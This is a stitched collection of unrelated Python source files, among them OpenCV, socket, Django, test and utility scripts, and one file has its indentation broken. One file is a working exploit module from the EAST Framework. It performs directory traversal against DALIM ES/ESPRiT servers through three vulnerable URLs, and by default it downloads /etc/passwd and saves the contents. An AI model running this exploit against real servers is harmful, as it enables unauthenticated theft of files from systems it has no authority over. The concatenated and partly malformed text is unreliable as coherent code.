                    cv2.putText(attr_placeholder_img, f"{int(color_prob * 100)}%", (150, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0))
                    cv2.putText(attr_placeholder_img, f"{int(type_prob * 100)}%", (150, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0))
                    attr_combined = np.hstack((attr_img, attr_placeholder_img))
                    if attr_stacked is None:
                        attr_stacked = attr_combined
                    else:
                        attr_stacked = np.vstack((attr_stacked, attr_combined))
                if attr_stacked is not None:
                    cv2.imshow("Attributes", attr_stacked)
            key = cv2.waitKey(1)
            if key == ord('q'):
                break
    except KeyboardInterrupt:
        pass
    # Signal the worker threads to exit and wait for them.
    running = False
    det_t.join()
    rec_t.join()
    attr_t.join()
    veh_t.join()
    print("FPS: {:.2f}".format(fps.fps()))
    if not args.camera:
        cap.release()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Interactive exercise: greet the user, compute their birth year, and compare
# their age with the age of the Python language (created 1991).
osoba = input("Jak się nazywasz? ")
wiek = input("ile masz lat? ")
print("Witaj, ", osoba, "!")
# Reference year used by this exercise.
rok_biezacy = 2017
print("Urodziłeś się w: ", rok_biezacy - int(wiek))
rok_pythona = 1991
wiek_pythona = rok_biezacy - rok_pythona
wiek_osoby = int(wiek)
if wiek_pythona > wiek_osoby:
    print("Python jest starszy")
elif wiek_pythona < wiek_osoby:
    print("Ty jesteś starszy")
else:
    print("Jesteście w tym samym wieku")
|
import socket
import config
from settings import ai,ak,sk
from aip import AipSpeech
# Baidu AIP speech client; app id / API key / secret come from settings.
asp = AipSpeech(ai,ak,sk)
# Directory where the synthesized audio file is written.
voice_path = './'
# server_IP = '0.0.0.0'
# server_PORT = 15678
message = 'I am Client\n'
# Connect to the server from config.py, announce ourselves, and read back
# up to 4 KB of text to synthesize.
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((config.server_IP, config.server_PORT))
client.send(message.encode('utf-8'))
from_server = client.recv(4096)
modified_message = from_server.decode('utf-8')
client.close()
print(from_server)
print(modified_message)
# Synthesize Mandarin speech with explicit volume/voice/pitch/speed options.
ans = asp.synthesis(modified_message,'zh',1,{'vol':5,'per' : 2, 'pit' : 6,'spd' : 6,'cuid':123})
# On success the API returns raw audio bytes; a dict indicates an error payload.
if not isinstance(ans, dict):
    with open(voice_path + 'audio.wav','wb') as f:
        f.write(ans)
|
from typing import Union
from .abstract_classes import Field
from .schema import Schema
from .utils import from_iso_date, from_iso_datetime
class String(Field):
    def deserialize(self, value: str) -> str:
        """Pass-through: string values need no conversion."""
        return value
class Date(Field):
    def deserialize(self, value: str):
        """Parse an ISO-8601 date string into a date object."""
        return from_iso_date(value)
class DateTime(Field):
    def deserialize(self, value: str):
        """Parse an ISO-8601 datetime string into a datetime object."""
        return from_iso_datetime(value)
class Nested(Field):
    """Field whose value is deserialized through another Schema (a dict, or a
    list of dicts when `many=True`)."""
    # Schema subclass (not instance) used to deserialize nested payloads.
    related_schema = None
    def __init__(self, schema):
        # Accept only Schema subclasses; instances would break the .load call.
        assert issubclass(schema, Schema)
        self.related_schema = schema
        super().__init__()
    def deserialize(self, value: Union[dict, list], many: bool = False):
        """Delegate to the related schema; pass many=True for a list of objects."""
        return self.related_schema.load(data=value, many=many)
|
"""
Some audio files in the dataset are too big to be processed in one step,
so they need to be splitted beforehand.
"""
import argparse
# empirically defined 20 MB .mp3 file is big enough to crash feature extractors
import os
from _json import make_encoder
from pathlib import Path
from shutil import copyfile
import sys,inspect
current_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parent_dir = os.path.dirname(current_dir)
sys.path.insert(0, parent_dir)
import pandas as pd
from config import RAW_DATA_PATH, AVAIL_MEDIA_TYPES, makedirs
if __name__ == '__main__':
    # Move files that sit in the source folder but are not listed in the label
    # file (or have an unrecognized/explicitly targeted extension) to dest_path.
    parser = argparse.ArgumentParser(description='Extract features from a data folder to another')
    parser.add_argument('--src_path', help='Source path where audio data files are stored', default=Path('..') / RAW_DATA_PATH)
    # BUG FIX: help text was copy-pasted from --src_path.
    parser.add_argument('--dest_path', help='Destination path where skipped files are moved', default=Path('..') / RAW_DATA_PATH / 'skipped')
    parser.add_argument('--label_file', help='file name of label file', default='labels.csv')
    parser.add_argument('--ext', help='name of a valid extension to be cleansed', default=None)
    args = parser.parse_args()
    src_path = Path(args.src_path)
    dest_path = Path(args.dest_path)
    _ext = args.ext
    makedirs(dest_path)
    label_filename = args.label_file
    df = pd.read_csv(src_path / label_filename)
    # Filenames present on disk but absent from the label file are candidates to move.
    df_filenames = set(df['filename'])
    os_filenames = set(os.listdir(src_path))
    # keep the filenames that are in the folder and not in the label file
    dif_filenames = os_filenames - df_filenames
    for filename in dif_filenames:
        ext = filename.split('.')[-1]
        if _ext and ext == _ext:
            # Explicitly requested extension: always move it.
            pass
        elif ext not in AVAIL_MEDIA_TYPES:
            # BUG FIX: the message previously printed the literal '{}' because
            # .format(filename) was missing.
            print('info: skipping {}. Extension not recognized.'.format(filename))
            continue
        os.replace(src_path / filename, dest_path / filename)
        print('info: moving {} from {} to {}.'.format(filename, src_path, dest_path))
|
"""connection.py: Connection for connecting to serial or sf ports."""
import logging
import threading
import time
from codecs import encode
from six.moves import queue
from moteconnection.connection_events import ConnectionEvents
from moteconnection.connection_forwarder import SfConnection
from moteconnection.connection_serial import SerialConnection
from moteconnection.utils import split_in_two
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
__author__ = "Raido Pahtma"
__license__ = "MIT"
class DispatcherError(Exception):
    """Raised when no dispatcher is registered for a packet's dispatch byte."""
    pass
class ConnectionBusyException(Exception):
    """Raised when connect() is called while a connection attempt is already active."""
    pass
class ConnectionException(Exception):
    """Raised for unsupported connection strings or other connection setup errors."""
    pass
class Connection(threading.Thread):
    """Event-loop thread multiplexing packets between dispatchers and a real
    transport (serial, sf forwarder, or loopback).

    All work is funneled through an internal queue of (event_type, payload)
    tuples so that connect/disconnect/send/receive are serialized on this
    thread. Connection state is tracked with two Events (`_connected`,
    `_disconnected`); both clear means "connecting".
    """
    def __init__(self, autostart=True):
        super(Connection, self).__init__()
        # dispatch byte -> Dispatcher for routing incoming/outgoing packets.
        self._dispatchers = {}
        self._real_connection = None
        self._last_connect = 0
        self._connection_type = None
        self._connection_info = None
        self._reconnect_period = None
        # Optional user callbacks fired on (dis)connect events.
        self._event_connected = None
        self._event_disconnected = None
        # New connection types can be added here
        self.connection_types = {"loopback": LoopbackConnection, "sf": SfConnection, "serial": SerialConnection}
        self._queue = queue.Queue()
        # Can be connected, disconnected or somewhere in between
        self._connected = threading.Event()
        self._connected.clear()
        self._disconnected = threading.Event()
        self._disconnected.set()
        # Cleared by join() to stop the run() loop.
        self._alive = threading.Event()
        self._alive.set()
        if autostart:
            self.start()
    def join(self, timeout=None):
        """Stop the event loop, tear down the transport, and join the thread."""
        self._alive.clear()
        if self._real_connection is not None:
            self._real_connection.join(timeout)
        threading.Thread.join(self, timeout)
    def send(self, packet):
        """Route an outgoing packet through the dispatcher matching its dispatch byte.

        Raises DispatcherError if no dispatcher is registered for it.
        """
        if packet.dispatch in self._dispatchers:
            self._dispatchers[packet.dispatch].send(packet)
        else:
            raise DispatcherError("No dispatcher for sending {:02X}".format(packet.dispatch))
    def register_dispatcher(self, dispatcher):
        """Register `dispatcher` for its dispatch byte, replacing any existing one."""
        self.remove_dispatcher(dispatcher.dispatch)
        self._dispatchers[dispatcher.dispatch] = dispatcher
        dispatcher.attach(self._subsend)
    def remove_dispatcher(self, dispatch):
        """Detach and forget the dispatcher for `dispatch`, if any."""
        if dispatch in self._dispatchers:
            self._dispatchers[dispatch].detach()
            del self._dispatchers[dispatch]
    def retrieve_dispatcher(self, dispatch):
        """Return the dispatcher registered for `dispatch`, or None."""
        if dispatch in self._dispatchers:
            return self._dispatchers[dispatch]
        return None
    def connected(self):
        """True when fully connected (not while connecting or disconnected)."""
        # NOTE(review): Event.isSet() is a deprecated alias of is_set().
        return self._connected.isSet() and not self._disconnected.isSet()
    def connect(self, connection_string, reconnect=None, connected=None, disconnected=None):
        """
        :param connection_string: "type@info", e.g. "serial@/dev/ttyUSB0" or "sf@host:port".
        :param reconnect: Optional reconnect period. Connection is attempted once if not set.
        :param connected: Optional callback for receiving connection establishment notifications.
        :param disconnected: Optional callback for receiving disconnection notifications.
        :return:
        """
        # Only start a new attempt when fully disconnected and idle.
        if self._connected.isSet() is False and self._disconnected.isSet():
            log.debug("connect")
            conntype, conninfo = split_in_two(connection_string, "@")
            if conntype in self.connection_types:
                self._connection_type = conntype
                self._connection_info = conninfo
                self._reconnect_period = reconnect
                self._event_connected = connected
                self._event_disconnected = disconnected
                self._disconnected.clear()
                self._queue.put((ConnectionEvents.EVENT_START_CONNECT, None))
            else:
                raise ConnectionException("Specified connection type {:s} not supported".format(conntype))
        else:
            raise ConnectionBusyException("Busy")
    def disconnect(self):
        """Cancel reconnects, close the transport, and block until disconnected."""
        self._reconnect_period = None
        log.debug("disconnect")
        while not self._connected.is_set() and not self._disconnected.is_set():  # Connecting
            log.debug("waiting")
            self._connected.wait(0.1)
        if self._real_connection is not None:
            self._real_connection.join()
        self._disconnected.wait()
    def _subsend(self, packet):
        # Called by attached dispatchers; queue the packet for the event loop,
        # or immediately fail its callback when there is no transport.
        if self._real_connection is not None:
            self._queue.put((ConnectionEvents.MESSAGE_OUTGOING, packet))
        else:
            if packet.callback is not None:
                packet.callback(packet, False)
    def _receive(self, data):
        # Route raw incoming data by its first byte (the dispatch code).
        if len(data) > 0:
            dispatch = ord(data[0:1])
            if dispatch in self._dispatchers:
                self._dispatchers[dispatch].receive(data)
            else:
                log.debug("No dispatcher for receiving %02X", dispatch)
        else:
            log.debug("Received 0 bytes of data ...")
    def run(self):
        """Event loop: drain the queue; on idle, schedule reconnects if configured."""
        while self._alive.isSet():
            try:
                item_type, item = self._queue.get(True, 1.0)
                if item_type == ConnectionEvents.MESSAGE_INCOMING:
                    log.debug("incoming %s", encode(item, "hex"))
                    self._receive(item)
                elif item_type == ConnectionEvents.MESSAGE_OUTGOING:
                    log.debug("outgoing %s", item)
                    self._real_connection.send(item)
                elif item_type == ConnectionEvents.EVENT_CONNECTED:
                    log.info("connected")
                    self._connected.set()
                    self._disconnected.clear()
                    if callable(self._event_connected):
                        self._event_connected()
                elif item_type == ConnectionEvents.EVENT_DISCONNECTED:
                    log.info("disconnected")
                    self._connected.clear()
                    self._disconnected.set()
                    if callable(self._event_disconnected):
                        self._event_disconnected()
                elif item_type == ConnectionEvents.EVENT_START_CONNECT:
                    self._connect()
                else:
                    raise Exception("item_type is unknown!")
            except queue.Empty:
                # Idle tick: retry the connection once the reconnect period elapses.
                if self._disconnected.isSet():
                    if self._reconnect_period is not None and self._reconnect_period >= 0:
                        if time.time() > self._last_connect + self._reconnect_period:
                            self._queue.put((ConnectionEvents.EVENT_START_CONNECT, None))
                continue
    def _connect(self):
        # Instantiate the concrete transport; it reports progress via _queue.
        self._last_connect = time.time()
        self._real_connection = self.connection_types[self._connection_type](self._queue, self._connection_info)
class Dispatcher(object):
    """Base class for protocol handlers keyed by a one-byte dispatch code."""

    def __init__(self, dispatch):
        self._dispatch = dispatch
        self._sender = None

    @property
    def dispatch(self):
        """The dispatch byte this handler is registered for."""
        return self._dispatch

    @staticmethod
    def _deliver(receiver, message):
        # A receiver may be either a queue.Queue or a plain callable.
        if isinstance(receiver, queue.Queue):
            receiver.put(message)
            return
        receiver(message)

    def attach(self, sender):
        """Remember the connection's send hook."""
        self._sender = sender

    def detach(self):
        """Forget the connection's send hook."""
        self._sender = None

    def send(self, packet):
        raise NotImplementedError

    def receive(self, data):
        raise NotImplementedError
class LoopbackConnection(threading.Thread):
    """Test transport that echoes every sent packet back as an incoming message."""

    def __init__(self, event_queue, info):
        super(LoopbackConnection, self).__init__()
        self._events = event_queue
        self._info = info
        # Starts immediately; run() announces the connection.
        self.start()

    def join(self, timeout=None):
        # Tell the owning Connection we are gone, then join the thread.
        self._events.put((ConnectionEvents.EVENT_DISCONNECTED, None))
        threading.Thread.join(self, timeout)

    def send(self, data):
        # Loop the outgoing packet straight back to the reader.
        self._events.put((ConnectionEvents.MESSAGE_INCOMING, data))

    def run(self):
        self._events.put((ConnectionEvents.EVENT_CONNECTED, None))
|
import os
def name_ext(path):
    """Split `path` into (stem, extension), keeping compound '.tar.*' suffixes whole."""
    stem, extension = os.path.splitext(path)
    # '.tar.gz' and friends should be treated as one extension.
    if stem.endswith('.tar'):
        return stem[:-len('.tar')], '.tar' + extension
    return stem, extension
def name(path):
    """Return only the stem portion of `path` (see name_ext)."""
    stem, _ = name_ext(path)
    return stem
def ext(path):
    """Return only the extension portion of `path` (see name_ext)."""
    _, extension = name_ext(path)
    return extension
## The search parameter is for Egg files, since they have a different structure
def zip_files(zf, search='egg-info'):
    """Return [(file_bytes, basename)] for every member of `zf` whose name contains `search`."""
    matches = [member for member in zf.namelist() if search in member]
    contents = [zf.read(member) for member in matches]
    basenames = [os.path.basename(member) for member in matches]
    return list(zip(contents, basenames))
def tar_files(tf, search='egg-info'):
    """Return [(file_bytes, basename)] for metadata files inside tarball `tf`.

    Matches members whose name contains `search` but skips the directory
    entry itself (names ending exactly with `search`). The `search`
    parameter generalizes the previously hard-coded 'egg-info' and keeps
    the signature consistent with zip_files(); the default preserves the
    original behavior.
    """
    names = [n for n in tf.getnames() if search in n and not n.endswith(search)]
    fobj_list = [tf.extractfile(n).read() for n in names]
    return list(zip(fobj_list, map(os.path.basename, names)))
from GetPot import GetPot
import numpy as np
import sys
import time
def g(xa=0.75, loc=2.0, D=0.5, S=1.0):
    """Analytic diffusion-theory flux at depth `loc`.

    xa  -- macroscopic absorption cross section
    loc -- depth in cm
    D   -- diffusion coefficient
    S   -- source strength
    """
    diffusion_length = np.sqrt(D / xa)
    attenuation = 1.0 - np.exp(-loc / diffusion_length)
    return (S / xa) * attenuation
if __name__=='__main__':
cl = GetPot(sys.argv)
if cl.search('-i'):
inpFileName = ''
inpFileName = cl.next(inpFileName)
input_file=GetPot(Filename=inpFileName)
else: raise IOError('Requires an input file using -i.')
xa = input_file('Problem/xa' ,1.0)
D = input_file('Problem/D' ,1.0)
loc= input_file('Problem/loc',1.0)
S = input_file('Problem/S' ,1.0)
outFileName = input_file('Output/file','test.out')
print 'outFileName:',outFileName
result = g(xa,D,loc,S)
writeFile = file(outFileName,'w')
writeFile.writelines('res,'+str(result)+'\n')
writeFile.close()
|
# Generated by Django 2.0.7 on 2018-09-16 20:14
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds three nullable DecimalField columns
    (`ajustado`, `ideal`, `predito`; max 5 digits, 2 decimal places) to the
    `ficha` model."""
    dependencies = [
        ('ficha', '0004_auto_20180915_1036'),
    ]
    operations = [
        migrations.AddField(
            model_name='ficha',
            name='ajustado',
            field=models.DecimalField(blank=True, decimal_places=2, max_digits=5, null=True),
        ),
        migrations.AddField(
            model_name='ficha',
            name='ideal',
            field=models.DecimalField(blank=True, decimal_places=2, max_digits=5, null=True),
        ),
        migrations.AddField(
            model_name='ficha',
            name='predito',
            field=models.DecimalField(blank=True, decimal_places=2, max_digits=5, null=True),
        ),
    ]
|
"""
Unittest for familytree.layout.butterfly module.
"""
from familytree.person import Person
from familytree.table import Table
from familytree.layout.butterfly import ButterflyLayout
def _get_box(elements, person):
    """Return the single layout element whose `.person` attribute equals `person`."""
    matches = [element for element in elements
               if getattr(element, 'person', None) == person]
    # The layout is expected to emit exactly one box per person.
    assert len(matches) == 1
    return matches[0]
class TestButterflyLayout:
    """Checks ButterflyLayout geometry: parents on one row, the focused
    couple and siblings on the row below, ordered left-to-right."""
    def test_butterfly(self):
        """Full butterfly: both families of a married couple plus siblings."""
        table = Table([
            Person(1, "father1", "M", spouse_id=2),
            Person(2, "mother1", "F", spouse_id=1),
            Person(3, "brother1", "M", father_id=1, mother_id=2, birth_order=1),
            Person(4, "brother2", "M", father_id=1, mother_id=2, birth_order=3),
            Person(5, "husband", "M", spouse_id=6, father_id=1, mother_id=2, birth_order=2),
            Person(6, "wife", "F", spouse_id=5, father_id=7, mother_id=8, birth_order=1),
            Person(7, "father2", "M", spouse_id=8),
            Person(8, "mother2", "F", spouse_id=7),
            Person(9, "sister1", "F", father_id=7, mother_id=8, birth_order=2)
        ])
        layout_func = ButterflyLayout()
        elements = layout_func(table, table.get(5))
        # 9 person boxes + 3 couple connectors + 5 child connectors.
        assert len(elements) == 9 + 3 + 5
        box_p1 = _get_box(elements, table.get(1))
        box_p2 = _get_box(elements, table.get(2))
        box_p3 = _get_box(elements, table.get(3))
        box_p4 = _get_box(elements, table.get(4))
        box_p5 = _get_box(elements, table.get(5))
        box_p6 = _get_box(elements, table.get(6))
        box_p7 = _get_box(elements, table.get(7))
        box_p8 = _get_box(elements, table.get(8))
        box_p9 = _get_box(elements, table.get(9))
        # Parent generation: left-to-right on a single row.
        assert box_p1.xmin < box_p2.xmin < box_p7.xmin < box_p8.xmin
        assert box_p1.ymin == box_p2.ymin == box_p7.ymin == box_p8.ymin
        # Child generation: siblings, couple, then in-law siblings on one row.
        assert box_p3.xmin < box_p4.xmin < box_p5.xmin < box_p6.xmin < box_p9.xmin
        assert box_p3.ymin == box_p4.ymin == box_p5.ymin == box_p6.ymin == box_p9.ymin
    def test_single_no_parent_info(self):
        """A lone person with no relations yields only their own box."""
        table = Table([
            Person(1, "target"),
            Person(2, "other"),
            Person(3, "other"),
        ])
        layout_func = ButterflyLayout()
        elements = layout_func(table, table.get(1))
        assert len(elements) == 1
    def test_single_with_parents(self):
        """Unmarried target with parents and one sibling."""
        table = Table([
            Person(1, "father", "M", spouse_id=2),
            Person(2, "mother", "F", spouse_id=1),
            Person(3, "target", "M", father_id=1, mother_id=2, birth_order=1),
            Person(4, "brother", "M", father_id=1, mother_id=2, birth_order=2),
        ])
        layout_func = ButterflyLayout()
        elements = layout_func(table, table.get(3))
        # 4 person boxes + 1 couple connector + 2 child connectors.
        assert len(elements) == 4 + 1 + 2
        box_p1 = _get_box(elements, table.get(1))
        box_p2 = _get_box(elements, table.get(2))
        box_p3 = _get_box(elements, table.get(3))
        box_p4 = _get_box(elements, table.get(4))
        assert box_p1.xmin < box_p2.xmin
        assert box_p1.ymin == box_p2.ymin
        assert box_p3.xmin < box_p4.xmin
        assert box_p3.ymin == box_p4.ymin
    def test_couple_no_parent_info(self):
        """Couple without parents: two boxes plus one couple connector."""
        table = Table([
            Person(1, "husband", "M", spouse_id=2),
            Person(2, "wife", "F", spouse_id=1),
        ])
        layout_func = ButterflyLayout()
        elements = layout_func(table, table.get(1))
        assert len(elements) == 2 + 1
        box_p1 = _get_box(elements, table.get(1))
        box_p2 = _get_box(elements, table.get(2))
        assert box_p1.xmin < box_p2.xmin
        assert box_p1.ymin == box_p2.ymin
    def test_couple_partial_parent_info(self):
        """Couple where only the husband's side has parent data."""
        table = Table([
            Person(1, "father1", "M", spouse_id=2),
            Person(2, "mother1", "F", spouse_id=1),
            Person(3, "brother1", "M", father_id=1, mother_id=2, birth_order=1),
            Person(4, "brother2", "M", father_id=1, mother_id=2, birth_order=3),
            Person(5, "husband", "M", spouse_id=6, father_id=1, mother_id=2, birth_order=2),
            Person(6, "wife", "F", spouse_id=5),
        ])
        layout_func = ButterflyLayout()
        elements = layout_func(table, table.get(5))
        # 6 person boxes + 2 couple connectors + 3 child connectors.
        assert len(elements) == 6 + 2 + 3
        box_p1 = _get_box(elements, table.get(1))
        box_p2 = _get_box(elements, table.get(2))
        box_p3 = _get_box(elements, table.get(3))
        box_p4 = _get_box(elements, table.get(4))
        box_p5 = _get_box(elements, table.get(5))
        box_p6 = _get_box(elements, table.get(6))
        assert box_p1.xmin < box_p2.xmin
        assert box_p1.ymin == box_p2.ymin
        assert box_p3.xmin < box_p4.xmin < box_p5.xmin < box_p6.xmin
        assert box_p3.ymin == box_p4.ymin == box_p5.ymin == box_p6.ymin
|
#! /usr/bin/env python
# -*- coding: utf_8 -*-
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
import sys
import os
import urllib2
from collections import OrderedDict
sys.path.append('./core')
from Sploit import Sploit
# Exploit metadata consumed by the EAST framework UI.
INFO = {}
INFO['NAME'] = "efa_dalim_software_es_core_fd"
INFO['DESCRIPTION'] = "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal"
INFO['VENDOR'] = "https://www.dalim.com"
INFO['DOWNLOAD_LINK'] = ''
INFO['LINKS'] = ['https://www.exploit-db.com/exploits/42438/']
INFO["CVE Name"] = "?"
INFO["NOTES"] = """Affected version: ES/ESPRiT 5.0 (build 7184.1)
(build 7163.2)
(build 7163.0)
(build 7135.0)
(build 7114.1)
(build 7114.0)
(build 7093.1)
(build 7093.0)
(build 7072.0)
(build 7051.3)
(build 7051.1)
(build 7030.0)
(build 7009.0)
(build 6347.0)
(build 6326.0)
(build 6305.1)
(build 6235.9)
(build 6172.1)
ES/ESPRiT 4.5 (build 6326.0)
(build 6144.2)
(build 5180.2)
(build 5096.0)
(build 4314.3)
(build 4314.0)
(build 4146.4)
(build 3308.3)
ES/ESPRiT 4.0 (build 4202.0)
(build 4132.1)
(build 2235.0)
ES/ESPRiT 3.0
Input passed thru several parameters is not properly verified before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files from local resources with directory traversal attacks.
"""
INFO['CHANGELOG'] = "14 Aug 2017. Written by Gleg team."
INFO['PATH'] = 'Exploits/General/'
# Must be in every module, to be set by framework
# Each option maps to a (default_value, metadata-dict) tuple.
OPTIONS = OrderedDict()
OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP')
OPTIONS["PORT"] = 80, dict(description = 'Target port')
OPTIONS['PATH'] = 'etc/passwd', dict(description = 'Path to downloaded file at target machine')
class exploit(Sploit):
    """Directory-traversal file download against DALIM ES/ESPRiT endpoints (Python 2)."""
    def __init__(self, host = "", port = 0, logger = None):
        Sploit.__init__(self, logger = logger)
        self.name = INFO['NAME']
        self.host = host
        self.port = port
        # NOTE(review): OPTIONS['PATH'] is a (value, metadata) tuple, so
        # self.path is only a usable string after args() replaces it;
        # presumably the framework always calls run() -> args() first — confirm.
        self.path = OPTIONS['PATH']
        self.urls = None
    def args(self):
        # Pull framework-supplied option values; note this rebinds self.args
        # from a method to a dict on first call.
        self.args = Sploit.args(self, OPTIONS)
        self.host = self.args.get('HOST', self.host)
        self.port = int(self.args.get('PORT', self.port))
        self.path = self.args.get('PATH', OPTIONS['PATH'])
        # Three known traversal entry points; the relative path is appended.
        self.urls = ['Esprit/public/Password.jsp?orgName=../../../../../../../../../',
                     'Esprit/ES/Login?orgUnitName=../../../../../../../../../',
                     'dalimws/log?len=10000&download=true&file=../../../../../../../']
    def make_url(self, path = ''):
        """Build an absolute http URL for the configured host/port."""
        return 'http://{}:{}/{}'.format(self.host, self.port, path)
    def run(self):
        """Try each traversal URL until one returns file content, then save it."""
        self.args()
        self.log("Attacking {}".format(self.host))
        content = ''
        for url in self.urls:
            curl = self.make_url(url + self.path)
            self.log('Try to download file ' + self.path)
            try:
                fd = urllib2.urlopen(curl)
                content = fd.read()
                if content:
                    self.log('= File Content =')
                    self.log(content)
                    self.log('= End of File =')
                    self.writefile(content)
                    # First successful download wins.
                    self.finish(True)
                    break
            except Exception as e:
                # Log and fall through to the next candidate URL.
                self.log(e)
        self.finish(False)
if __name__ == '__main__':
    """
    By now we only have the tool mode for exploit..
    Later we would have standalone mode also.
    """
    # Standalone invocation with default host/port (Python 2 print statement).
    print "Running exploit %s .. " % INFO['NAME']
    e = exploit('', 80)
    e.run()
|
# USAGE
# python ~/ML/cats-vs-dogs/caffe/code/check_dpu_runtime_accuracy.py -i ~/ML/cats-vs-dogs/deephi//quantiz/zcu102/rpt/logfile_top2_alexnetBNnoLRN.txt
# It checks the top-1 and top-2 accuracy obtained at runtime by DeePhi DPU, by analysis of the related logfile
# by daniele.bagni@xilinx.com
# ##################################################################################################
import warnings
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
warnings.filterwarnings("ignore", message="numpy.ufunc size changed")
import numpy as np
from datetime import datetime
import os
import sys
import argparse
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--file", required=True, help="input logfile")
ap.add_argument("-n", "--numel", default="1000", help="number of test images")
args = vars(ap.parse_args())
logfile = args["file"] # root path name of dataset
# NOTE(review): if open() fails, execution still falls through to the parsing
# loop below and crashes on the undefined `lines`/`tot_lines`; consider sys.exit().
try:
    f = open(logfile, "r")
except IOError:
    print 'cannot open ', logfile
else:
    lines = f.readlines()
    tot_lines = len(lines)
    print logfile, ' has ', tot_lines, ' lines'
    #f.seek(0)
    f.close()
# ##################################################################################################
NUMEL = int(args["numel"]) #1000
# initialize the label names for the CATS-vs-DOGS dataset
labelNames = {"cat" : 0, "dog" : 1 }
# ##################################################################################################
top1_true = 0      # images whose best (top-1) prediction matches the ground truth
top1_false = 0     # images matched only by the second-best (top-2) guess
img_count = 0      # total images parsed from the log
false_pred = 0     # NOTE(review): never updated or read below
test_ids = np.zeros(([NUMEL,1]))   # ground-truth label per image
preds = np.zeros(([NUMEL, 1]))     # predicted label per image
idx = 0
# Each "DBG" line is followed by the two top-2 prediction lines; the ground
# truth class is encoded in the image filename (e.g. "cat.123.jpg").
for ln in range(0, tot_lines):
    if "DBG" in lines[ln]:
        top2_lines = lines[ln:ln+3]
        filename= top2_lines[0].split("images/")[1]
        s2 = filename.index(".")
        class_name = filename[: s2].strip()
        #print 'DBG: found class ', class_name, ' in line ', ln, ': ', lines[ln]
        predicted = top2_lines[1].split("name = ")[1].strip()
        if class_name in top2_lines[1]:
            top1_true += 1
        elif class_name in top2_lines[2]:
            top1_false +=1
        else:
            print "ERROR: no class detected\n"
            sys.exit(0)
        test_ids[idx] = labelNames[class_name] # ground truth
        preds[idx] = labelNames[predicted ] # actual prediction
        if (predicted != class_name) :
            # Dump details of every misprediction for manual inspection.
            print "LINE: ", top2_lines[0].split("./")[1].strip()
            print "PREDICTED: ", preds[idx], predicted
            print "EXPECTED : ", test_ids[idx], class_name
            for k in range(1, 3):
                print top2_lines[k].strip()
            print "\n"
        img_count +=1
        idx += 1
        # NOTE(review): stopping at NUMEL-1 processes one image fewer than
        # requested — confirm whether `idx == NUMEL` was intended.
        if ( idx == (NUMEL-1) ):
            break
    else:
        continue
assert (top1_true+top1_false) == img_count, "ERROR: top1 true+false not equal to the number of images"
print 'number of total images predicted ', img_count
print 'number of top1 false predictions ', top1_false
print 'number of top1 right predictions ', top1_true
top1_accuracy = float(top1_true)/(top1_true+top1_false)
print('top1 accuracy = %.2f' % top1_accuracy)
|
def nian_qw(year):
    """Print whether *year* is a leap year ("闰年") or a common year ("平年")."""
    is_leap = (year % 4 == 0 and year % 100 != 0) or year % 400 == 0
    print("闰年" if is_leap else "平年")
# Script entry: ask the user for a year and classify it.
year = int(input("请输入你要查看的年份:"))
nian_qw(year)
|
def countryList():
    """Return the list of Sub-Saharan African country names used by this module.

    Entries commented out in the original data (Cape Verde, the Congos,
    Cote d'Ivoire, The Gambia, Reunion, Western Sahara) are deliberately
    excluded — presumably because of naming mismatches in the data source.
    """
    names = (
        "Angola|Benin|Botswana|Burkina Faso|Burundi|Cameroon|"
        "Central African Republic|Chad|Comoros|Djibouti|Equatorial Guinea|"
        "Eritrea|Ethiopia|Gabon|Ghana|Guinea|Guinea-Bissau|Kenya|Lesotho|"
        "Liberia|Madagascar|Malawi|Mali|Mauritania|Mauritius|Mozambique|"
        "Namibia|Niger|Nigeria|Rwanda|Sao Tome and Principe|Senegal|"
        "Seychelles|Sierra Leone|Somalia|South Africa|Sudan|Swaziland|"
        "Tanzania|Togo|Uganda|Zambia|Zimbabwe"
    )
    return names.split("|")
def comparisonList():
    """Return the fixed list of comparison countries (two European, one Benelux, three African)."""
    return ["Sweden", "United Kingdom", "Belgium", "Ethiopia", "Uganda", "Zimbabwe"]
# Manual smoke test (Python 2 print statements).
if __name__=="__main__":
    print countryList()
    print comparisonList()
|
class Solution:
    """LeetCode 1466-style check: does *s* contain every binary code of length *k*?"""

    def hasAllCodes(self, s: str, k: int) -> bool:
        """Return True iff all 2**k binary strings of length k occur as substrings of s."""
        remaining = 1 << k          # distinct codes still to be discovered
        seen = set()
        for end in range(k, len(s) + 1):
            window = s[end - k:end]
            if window in seen:
                continue
            seen.add(window)
            remaining -= 1
            if not remaining:       # every possible code has been observed
                return True
        return False
from django.contrib import admin
from sms_app.models.models import *
# Register every SMS-app model with the default admin site, in the same
# order as the original one-per-line registrations.
for _model in (
    Address,
    Employee,
    Post,
    Sanatorium,
    RoomPlacesType,
    RoomType,
    Room,
    TreatmentCourse,
    CustomerInfo,
    Booking,
    Customer,
):
    admin.site.register(_model)
|
from service.config.service_config import ServiceConfig
from service.db.db_base import DBBase
from service.providers.channel_provider import ChannelProvider
from service.services.chat_service_base import ChatServiceBase
from service.services.web_service_base import WebServiceBase
class ServiceDependencies(object):
    """Typed container bundling the service's shared dependencies for injection."""
    # Parsed service configuration.
    config: ServiceConfig
    # Database access layer (any DBBase implementation).
    db: DBBase
    # HTTP/web front-end service.
    web_service: WebServiceBase
    # Chat back-end service.
    chat_service: ChatServiceBase
    # Resolves/provides communication channels.
    channel_provider: ChannelProvider
|
# Decorators 2 - Name Directory
#######################################################################################################################
#
# Let's use decorators to build a name directory! You are given some information about N people. Each person has
# a first name, last name, age and sex. Print their names in a specific format sorted by their age in ascending
# order i.e. the youngest person's name should be printed first. For two people of the same age,
# print them in the order of their input.
#
# For Henry Davids, the output should be:
# Mr. Henry Davids
#
# For Mary George, the output should be:
# Ms. Mary George
#
# Input Format
